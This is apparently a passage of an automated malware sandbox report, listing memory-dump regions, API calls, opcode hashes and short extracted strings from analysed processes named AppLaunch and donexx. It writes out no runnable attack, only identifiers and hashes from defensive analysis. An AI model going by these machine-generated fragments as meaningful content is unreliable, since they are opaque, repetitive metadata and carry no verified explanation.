                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0AB09F16
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 5fb431902302c96a66b21732f038200da19d9bc78e8be5534687085b034254ab
                                                                            • Instruction ID: 25e272cdfb269762a75f6f348dfee41205208ae7ba6ebeb289a33cfb3ece9fd7
                                                                            • Opcode Fuzzy Hash: 5fb431902302c96a66b21732f038200da19d9bc78e8be5534687085b034254ab
                                                                            • Instruction Fuzzy Hash: 1711F0B6C002498FCB20CF9AC944BDEFBF4EB88324F1484AAD819A7251D374A545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0AB09F16
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 2fdf6c0ab825ae8484153410fc46b2ec448e021afb8a1585bb10f096168edbae
                                                                            • Instruction ID: a59696feb921f3ca98296ea382de8024867206e25b3bcbdf50d901f0b9b2eb37
                                                                            • Opcode Fuzzy Hash: 2fdf6c0ab825ae8484153410fc46b2ec448e021afb8a1585bb10f096168edbae
                                                                            • Instruction Fuzzy Hash: F41113B6C002498FDB20CFAAC944ADEFBF4EF88320F15845AD429B7650C378A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 052AECEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 51533f34271938c68c4e7b76225f50f8d74a3779f73970599b7c16230bbd4216
                                                                            • Instruction ID: ca4f2ba7a7808e456d24529a2398be8909926ccf29474c8a8648f76733dcc40d
                                                                            • Opcode Fuzzy Hash: 51533f34271938c68c4e7b76225f50f8d74a3779f73970599b7c16230bbd4216
                                                                            • Instruction Fuzzy Hash: CD1103B19002498FDB20CF99D984BDEFFF4AF88324F24845AD459A3350C774A545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: dc983246b9e036eaae39bfd1d508f9e9c8ecbbdace99b9b0ca7d8761836f0b65
                                                                            • Instruction ID: 20cf91b5e6757a21bdcc9e22ab7b1768dfef5692423b752c5e9ed3d76b167bde
                                                                            • Opcode Fuzzy Hash: dc983246b9e036eaae39bfd1d508f9e9c8ecbbdace99b9b0ca7d8761836f0b65
                                                                            • Instruction Fuzzy Hash: F61115B59002498FCB20CF99D9447DEBBF4AB48324F24845AD418B7750D378A984CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 0528452d0c1e26f6c27394fdbc56ee9d25f9375f9c427fb912358dfabae915fd
                                                                            • Instruction ID: 3c2c53bd82e2a840be60bcb58e9a897f4279f869a3eeea086812e6f4a751409a
                                                                            • Opcode Fuzzy Hash: 0528452d0c1e26f6c27394fdbc56ee9d25f9375f9c427fb912358dfabae915fd
                                                                            • Instruction Fuzzy Hash: E111E5B59002498FCB20DF9AD944B9EBBF4AB48324F24845AD418A7310D378A984CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 052AECEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 8509e1b0deb3cd9c6c4512167139d5e1e04515004f2922015105563cc25ba50e
                                                                            • Instruction ID: 680345a5d9c4e660392a73d8cf78c0dac230a900f7ccb56e4ec2403ab9abbfe6
                                                                            • Opcode Fuzzy Hash: 8509e1b0deb3cd9c6c4512167139d5e1e04515004f2922015105563cc25ba50e
                                                                            • Instruction Fuzzy Hash: 0411D3B18002498FDB20DF9AD984B9EFBF8AB48324F24845AD519A7350D774A544CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472261641.00000000050FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 050FD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_50fd000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40e45cedd32f1155390353009a4c69f747897b20ffea8b0d25c0008faa174adc
                                                                            • Instruction ID: 4cd092cca0cb30f03528ea603aec70ccae3bed7ba77acd9826641138fbc98684
                                                                            • Opcode Fuzzy Hash: 40e45cedd32f1155390353009a4c69f747897b20ffea8b0d25c0008faa174adc
                                                                            • Instruction Fuzzy Hash: 7A213A72504244DFDB15CF14E9C0F2EBFA6FB88718F248569EA054B616C33AD846CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 460527142f1ad864f109d38fae2df15a58a14a84f52bf230b7c67c0dbcf0da75
                                                                            • Instruction ID: 79cd6749796c582797197f38b9d65c3bf7df802204b6d8c6086214f1c3cd2aa4
                                                                            • Opcode Fuzzy Hash: 460527142f1ad864f109d38fae2df15a58a14a84f52bf230b7c67c0dbcf0da75
                                                                            • Instruction Fuzzy Hash: 76210371604240DFDB24DF54E9C0B26BBA6FB84314F64C569E8094B29AC7BAD846CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 493be849a5689ac827f802773699e650c2d90fe81a8442e28e0d3f4af2fef1e3
                                                                            • Instruction ID: 210c96977402a53408585065ecf17bd9f0a572c6192bc42e07f415a0244dddd2
                                                                            • Opcode Fuzzy Hash: 493be849a5689ac827f802773699e650c2d90fe81a8442e28e0d3f4af2fef1e3
                                                                            • Instruction Fuzzy Hash: 2721F671604344DFDB14DF54E9C0F26BFA6FB84314F24C56DE8094B295CB7AD846CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472261641.00000000050FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 050FD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_50fd000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction ID: 8b1d3ad575f7dbc1308be768481408919fa1a326487381c3f7fe2af1949fca36
                                                                            • Opcode Fuzzy Hash: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction Fuzzy Hash: 5811E676504240CFDB16CF14D9C4B1ABFB2FB84724F24C6A9D9094B616C33AD45ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 647e1795f279123763bd51818ce11fa705b603491e76423f6d97edcb6bf329a1
                                                                            • Instruction ID: 38e2d7bea36245c2f0d123806dbc5f0871f3ebbf8a8bdf999a0bed53ff329dd0
                                                                            • Opcode Fuzzy Hash: 647e1795f279123763bd51818ce11fa705b603491e76423f6d97edcb6bf329a1
                                                                            • Instruction Fuzzy Hash: 0311BE75504280CFDB11CF54D5C0B26BFA2FB84314F28C6AAD8494B696C37AD44ACB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1410efef118f21b0695d9f19ef22fabbfdb768d2967e49ede1cfda46e8f082a
                                                                            • Instruction ID: 901f98c9010d562476dd3de9d1ae2e83f9b862c8368ad2e16f8f2664adc1d008
                                                                            • Opcode Fuzzy Hash: a1410efef118f21b0695d9f19ef22fabbfdb768d2967e49ede1cfda46e8f082a
                                                                            • Instruction Fuzzy Hash: 7311EF75504284CFDB16CF10D9C0B25BFB2FB84314F24C6ADD8494B692C33AD48ACB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$$`q$$`q
                                                                            • API String ID: 0-49757582
                                                                            • Opcode ID: 58eb521d53d60d689964afe3c34c0565496be570a30ead3784c6e2ca0cb9201d
                                                                            • Instruction ID: b4c5541d04922be36e76ef91c734e90d1d9138074e27109fcef9e6bcd5934d20
                                                                            • Opcode Fuzzy Hash: 58eb521d53d60d689964afe3c34c0565496be570a30ead3784c6e2ca0cb9201d
                                                                            • Instruction Fuzzy Hash: 54E24B7A250500EFCB4A9F98D988D55BBB2FF4D32471A85D8F6099B232C732D861EF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: a20bfdc89e1177946bd3e6483e98a0e07621dd514c6634d059c1507adb793b36
                                                                            • Instruction ID: 0292fba73f4404dbe5358d96fa7921bc9f6d6e5cdc6d1ede9ffe216a7a25a719
                                                                            • Opcode Fuzzy Hash: a20bfdc89e1177946bd3e6483e98a0e07621dd514c6634d059c1507adb793b36
                                                                            • Instruction Fuzzy Hash: 95125D34E11229CFDB14DF79D984AAEB7F2FF88304F558969E005AB255DB34A942CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: 5573b5df70d17a30405979e19b7baf43aace759639d17db1c0742f8ce3636c55
                                                                            • Instruction ID: 5770198735c1575d20c8f70e0128462cdd1a9cb194755e9145ae1604bf734209
                                                                            • Opcode Fuzzy Hash: 5573b5df70d17a30405979e19b7baf43aace759639d17db1c0742f8ce3636c55
                                                                            • Instruction Fuzzy Hash: DCB18D71A04605CFDB16CFA9D990AAEB7B2FF84310F14892AF4169B751CF38E845CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: d92101bdf629928286559479887dbb6b8e6c9f3a8cf25329d16395c4294003cc
                                                                            • Instruction ID: 378d32404e48d0df6e6be074fa829251204e1325d5d3ce23f0741727ad8db785
                                                                            • Opcode Fuzzy Hash: d92101bdf629928286559479887dbb6b8e6c9f3a8cf25329d16395c4294003cc
                                                                            • Instruction Fuzzy Hash: DAA15171E0860A8FCB02DFA8C880BEFFBB5FF49300F148569E545AB251DBB49945CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: d37770b4c88a387a6db720cbe4397b44ee70317180a0187e62cde279c3919b87
                                                                            • Instruction ID: d92f27af78455d958ef1e73021e4e482937bc076731f3cfa907857f698c23bc5
                                                                            • Opcode Fuzzy Hash: d37770b4c88a387a6db720cbe4397b44ee70317180a0187e62cde279c3919b87
                                                                            • Instruction Fuzzy Hash: EBA17371A0461ACFDB02DFA8D890BAFB7B5FF48304F05C569E805AB241DB74E985CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq
                                                                            • API String ID: 0-665751991
                                                                            • Opcode ID: d3326c52150963ec0bbe961e02b37f55b1d57c258d584f2eb935f1023a457e25
                                                                            • Instruction ID: 38aed71b498b590ea4bb22975272a6e52fe72c007952e8db4a45f9ca71c7be42
                                                                            • Opcode Fuzzy Hash: d3326c52150963ec0bbe961e02b37f55b1d57c258d584f2eb935f1023a457e25
                                                                            • Instruction Fuzzy Hash: 4B516D35A041058FCB05CBA8C884AAEB7F5FF49710F10866AF02ABB3A0CB359D05CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: 5fee970c76de50c20f85d320f48816097e5afcc6aab4720e7ed4b4dfd25e7699
                                                                            • Instruction ID: b281412070bcb8ab7b7c2311af754bb6cbaf085155a32ddb6eec6afe3bd18314
                                                                            • Opcode Fuzzy Hash: 5fee970c76de50c20f85d320f48816097e5afcc6aab4720e7ed4b4dfd25e7699
                                                                            • Instruction Fuzzy Hash: 36512E76610100AFCB459FA8C945D6A7FB7FF8D3147168098E6099B376DB32DC22EB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: f230d8c4635a4abbd37bbeb49026bd05c189d0ec1985f22784e78d678cf05b72
                                                                            • Instruction ID: cd764c2a3013530f5730a5bbb7f12f95a23c847e683257b14d626d8bab3e03e3
                                                                            • Opcode Fuzzy Hash: f230d8c4635a4abbd37bbeb49026bd05c189d0ec1985f22784e78d678cf05b72
                                                                            • Instruction Fuzzy Hash: E8514670A04B04CFD726CFAAD444766F7B5FB84301F00896AF46687790EB39E886CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: 8ab6f7ec849ebeffe8613753e48f32f68fa89aa634b3ffc95fe506de772d11e8
                                                                            • Instruction ID: 59b5d52b5e5acff4cf980ccb7527b18a16a0f5ed545fbdaa48812801c7a0f148
                                                                            • Opcode Fuzzy Hash: 8ab6f7ec849ebeffe8613753e48f32f68fa89aa634b3ffc95fe506de772d11e8
                                                                            • Instruction Fuzzy Hash: 04514F71A0410A8BDB42CFA8D480BEFB7B5FF48300F14C569F415AB281DBB1D985CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D@
                                                                            • API String ID: 0-2222373746
                                                                            • Opcode ID: 0dfa8c531e985bd979b9b012110171dfda02469d76fc9a17ef474bcec2c977e2
                                                                            • Instruction ID: d9362829e2ef04046d168dc61554998223883463bd242ce41729a500395d477f
                                                                            • Opcode Fuzzy Hash: 0dfa8c531e985bd979b9b012110171dfda02469d76fc9a17ef474bcec2c977e2
                                                                            • Instruction Fuzzy Hash: A7418D31F102068FCB4AEB758855ABB77B2FBC5300B148569E50997298EF30D942C795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: f1528ef6e2686da24f196340a71e2467f0d109e88b435bb29480f1759853408b
                                                                            • Instruction ID: d617466ae5855c40be63f59f898667861c80a884cccb12d039bf34897ef41841
                                                                            • Opcode Fuzzy Hash: f1528ef6e2686da24f196340a71e2467f0d109e88b435bb29480f1759853408b
                                                                            • Instruction Fuzzy Hash: 2141BD35A00616CFCB01CF68C584A6AFBB1FF49320F158699EA299B391DB30ED51CBD0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: cf7fab77fa4f2d20edbe0844dbcedf359e81a3f2547147dcc51b4452e1c648fb
                                                                            • Instruction ID: 5481a797613b40cf213057480178166bc1ecad98d5dd1cce73fe4a867056255d
                                                                            • Opcode Fuzzy Hash: cf7fab77fa4f2d20edbe0844dbcedf359e81a3f2547147dcc51b4452e1c648fb
                                                                            • Instruction Fuzzy Hash: F221D331B402159FDB11AB78DC59B6B7BB3AF89720F1184A6E402EB3A5DE308C06C791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \s`q
                                                                            • API String ID: 0-3034026754
                                                                            • Opcode ID: 2c4070a731dc108cdf4f98dcb3bc8d11f8d32d479674373e70cd479a265a93f4
                                                                            • Instruction ID: db8b174fe2cf0552a5ddd58c40932449ff71bf1f381b10a4f6dbf7b6fcad3864
                                                                            • Opcode Fuzzy Hash: 2c4070a731dc108cdf4f98dcb3bc8d11f8d32d479674373e70cd479a265a93f4
                                                                            • Instruction Fuzzy Hash: 0521D2317400204FD766DB78D69097A7BF9EF89A6030580A9F80ACB771DE21DC02C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 07f507d25fdc978da7b538249626782466d559eb61b63284aae8ffce54aecf59
                                                                            • Instruction ID: 9930d2730a74442dc9cc0ad1476836c4715e60b503d56f0c137a8fd26fc01744
                                                                            • Opcode Fuzzy Hash: 07f507d25fdc978da7b538249626782466d559eb61b63284aae8ffce54aecf59
                                                                            • Instruction Fuzzy Hash: 2931E374B402158FDB15DFA8C998BADB7B2BF88715F2004A8E502DB3A5CF719D06CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: dadb608fe653b9266365a8c7fb97d2d05388ad78d3ad8d8e635e5b97642dbc8f
                                                                            • Instruction ID: 5b47f50532f4662598b66444a64c6d7e8a2ca1c6604ddec126ef62078c2d9b59
                                                                            • Opcode Fuzzy Hash: dadb608fe653b9266365a8c7fb97d2d05388ad78d3ad8d8e635e5b97642dbc8f
                                                                            • Instruction Fuzzy Hash: 8F31F475B40214CFDB159BA9D598BADB7B2BF88705F104469E80ADB3A4CF71D806CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: px
                                                                            • API String ID: 0-3846731130
                                                                            • Opcode ID: e5355a83fa3ea3b3e497169dcb0890696ec0d341472e3e56a12a91ca8835c582
                                                                            • Instruction ID: fd9e090aea5f77c2e1f8917a670ad580478fe4d21ead00be8485d9ad19c5d63d
                                                                            • Opcode Fuzzy Hash: e5355a83fa3ea3b3e497169dcb0890696ec0d341472e3e56a12a91ca8835c582
                                                                            • Instruction Fuzzy Hash: 66213D35E00219DBDB159F68C5549EE7FB6EB8C320F148129E811AB390DE719C42CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: ef35354c6b2942874c1231fd6a7da6eb6211a6a391c58a9baeb4ec524464ecf6
                                                                            • Instruction ID: 8b330a12030bf92af81944009918b03c85fd4bafe6cdf4826cfda435ea5e2c5e
                                                                            • Opcode Fuzzy Hash: ef35354c6b2942874c1231fd6a7da6eb6211a6a391c58a9baeb4ec524464ecf6
                                                                            • Instruction Fuzzy Hash: AA218E31B901158FDB059B69D915BAEBBF7AFC8B10F10006AE106EB3A0CEB1DD018BD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Instruction ID: 7ef4e7af7d70f7ccecac983efa65d5a897f2c1dcec6f9d8ac4b654c80a5160b2
                                                                            • Opcode Fuzzy Hash: 29b3626d6630be61969d7fba2b1ccdac90f77a2f5d5b6e7bdcebbea08c49e42f
                                                                            • Instruction Fuzzy Hash: E9316070600F019FDB71CF2AD98475AB7F5EF84B60B108A2DE46A976D0DB30E446CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408337413.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_e0d000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3e9b8f6ac469ad62a42121391e70b7789b30e19490880bf5539b1b1a57db838
                                                                            • Instruction ID: 3ee4c4c7e40376e004a1b8353b77358641519dc7e9c5d0513f197abffc09a639
                                                                            • Opcode Fuzzy Hash: e3e9b8f6ac469ad62a42121391e70b7789b30e19490880bf5539b1b1a57db838
                                                                            • Instruction Fuzzy Hash: 98212572608340EFDB15CF94DDC0B26BF65FB88314F24C569E9056B2A6C336D896CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408337413.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_e0d000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9806a5ef0790725c33231bcd31551c8d3fedf0df19e595e30ee1108d18d2416
                                                                            • Instruction ID: e18980a8449d88f5727aa4dbd4e8c076b11e4607131c724140b2641b091fa08f
